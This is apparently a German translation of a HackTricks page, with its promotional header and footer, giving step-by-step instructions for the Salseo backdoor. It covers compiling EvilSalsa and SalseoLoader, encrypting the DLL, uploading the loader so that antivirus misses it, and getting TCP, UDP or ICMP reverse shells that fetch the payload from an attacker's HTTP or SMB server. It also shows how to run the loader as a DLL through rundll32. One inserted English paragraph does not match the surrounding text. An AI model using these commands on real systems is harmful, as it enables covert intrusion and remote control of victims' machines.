8.7 KiB
Salseo
Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!
Andere Möglichkeiten, HackTricks zu unterstützen:
- Wenn Sie Ihr Unternehmen in HackTricks beworben sehen möchten oder HackTricks als PDF herunterladen möchten, überprüfen Sie die ABONNEMENTPLÄNE!
- Holen Sie sich das offizielle PEASS & HackTricks-Merchandise
- Entdecken Sie The PEASS Family, unsere Sammlung exklusiver NFTs
- Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
- Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud Github-Repositories senden.
Kompilieren der Binärdateien
Laden Sie den Quellcode von GitHub herunter und kompilieren Sie EvilSalsa und SalseoLoader. Sie benötigen Visual Studio, um den Code zu kompilieren.
Kompilieren Sie diese Projekte für die Architektur des Windows-Systems, auf dem Sie sie verwenden werden (Wenn Windows x64 unterstützt, kompilieren Sie sie für diese Architekturen).
Sie können die Architektur auswählen innerhalb von Visual Studio im linken "Build" Tab unter "Platform Target".
(**Wenn Sie diese Optionen nicht finden können, klicken Sie auf "Project Tab" und dann auf "<Project Name> Properties")
Bauen Sie dann beide Projekte (Build -> Build Solution) (Im Log wird der Pfad der ausführbaren Datei angezeigt):
Vorbereiten des Backdoors
Zunächst müssen Sie die EvilSalsa.dll verschlüsseln. Dazu können Sie das Python-Skript encrypterassembly.py verwenden oder das Projekt EncrypterAssembly kompilieren:
Python
python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt
Windows
Salseo
Salseo is a backdoor that allows an attacker to maintain access to a compromised system. It is a simple backdoor that listens on a specified port and executes commands sent by the attacker. The backdoor can be compiled using MinGW and works on Windows systems.
EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt
Ok, jetzt hast du alles, was du brauchst, um das gesamte Salseo-Ding auszuführen: die kodierte EvilDalsa.dll und das Binärfile des SalseoLoader.
Lade das SalseoLoader.exe-Binärfile auf die Maschine hoch. Es sollte von keinem AV erkannt werden...
Führe den Backdoor aus
Erhalte eine TCP-Reverse-Shell (Laden der codierten DLL über HTTP)
Denke daran, einen nc als Reverse-Shell-Listener zu starten und einen HTTP-Server zu starten, um das kodierte EvilSalsa bereitzustellen.
SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>
Erhalt eines UDP-Reverse-Shells (Herunterladen einer codierten DLL über SMB)
Denken Sie daran, einen nc als Reverse-Shell-Listener zu starten und einen SMB-Server bereitzustellen, um das codierte evilsalsa herunterzuladen (impacket-smbserver).
SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>
Erhalt eines ICMP-Reverse-Shells (codierte DLL bereits im Opfer)
Dieses Mal benötigen Sie ein spezielles Tool im Client, um den Reverse-Shell zu empfangen. Downloaden Sie: https://github.com/inquisb/icmpsh
Deaktivieren von ICMP-Antworten:
sysctl -w net.ipv4.icmp_echo_ignore_all=1
#You finish, you can enable it again running:
sysctl -w net.ipv4.icmp_echo_ignore_all=0
Führen Sie den Client aus:
python icmpsh_m.py "<Attacker-IP>" "<Victm-IP>"
Innerhalb des Opfers führen wir das Salseo-Ding aus:
SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>
Kompilieren von SalseoLoader als DLL und Exportieren der Hauptfunktion
Öffnen Sie das SalseoLoader-Projekt mit Visual Studio.
Fügen Sie vor der Hauptfunktion hinzu: [DllExport]
Installieren Sie DllExport für dieses Projekt
Tools --> NuGet-Paket-Manager --> NuGet-Pakete für Lösung verwalten...
Suchen Sie nach dem DllExport-Paket (im Bereich Durchsuchen) und klicken Sie auf Installieren (und akzeptieren Sie das Popup)
Im Projektordner sind die Dateien DllExport.bat und DllExport_Configure.bat erschienen
Deinstallieren Sie DllExport
Klicken Sie auf Deinstallieren (ja, es ist seltsam, aber vertrauen Sie mir, es ist notwendig)
Visual Studio beenden und DllExport_configure ausführen
Einfach Visual Studio beenden
Gehen Sie dann zu Ihrem SalseoLoader-Ordner und führen Sie DllExport_Configure.bat aus
Wählen Sie x64 (wenn Sie es in einem x64-System verwenden möchten, das war mein Fall), wählen Sie System.Runtime.InteropServices (im Namespace für DllExport) und klicken Sie auf Anwenden
Öffnen Sie das Projekt erneut mit Visual Studio
[DllExport] sollte nicht mehr als Fehler markiert sein
Lösung erstellen
Wählen Sie Ausgabetyp = Klassenbibliothek (Projekt --> SalseoLoader-Eigenschaften --> Anwendung --> Ausgabetyp = Klassenbibliothek)
Wählen Sie die x64-Plattform (Projekt --> SalseoLoader-Eigenschaften --> Erstellen --> Zielplattform = x64)
Um die Lösung zu erstellen: Build --> Lösung erstellen (Im Ausgabekonsole wird der Pfad der neuen DLL angezeigt)
Testen Sie die generierte DLL
Kopieren Sie die DLL und fügen Sie sie ein, wo Sie sie testen möchten.
Ausführen:
rundll32.exe SalseoLoader.dll,main
Wenn kein Fehler angezeigt wird, haben Sie wahrscheinlich eine funktionierende DLL!!
Erhalten Sie eine Shell unter Verwendung der DLL
Vergessen Sie nicht, einen HTTP Server zu verwenden und einen nc Listener einzurichten
Powershell
$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main
CMD
CMD steht für Command Prompt, was die Befehlszeile in Windows-Betriebssystemen bezeichnet.
set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main
Erlernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!
Andere Möglichkeiten, HackTricks zu unterstützen:
- Wenn Sie Ihr Unternehmen in HackTricks beworben sehen möchten oder HackTricks im PDF-Format herunterladen möchten, überprüfen Sie die ABONNEMENTPLÄNE!
- Holen Sie sich das offizielle PEASS & HackTricks-Merchandise
- Entdecken Sie The PEASS Family, unsere Sammlung exklusiver NFTs
- Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
- Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud Github-Repositories einreichen.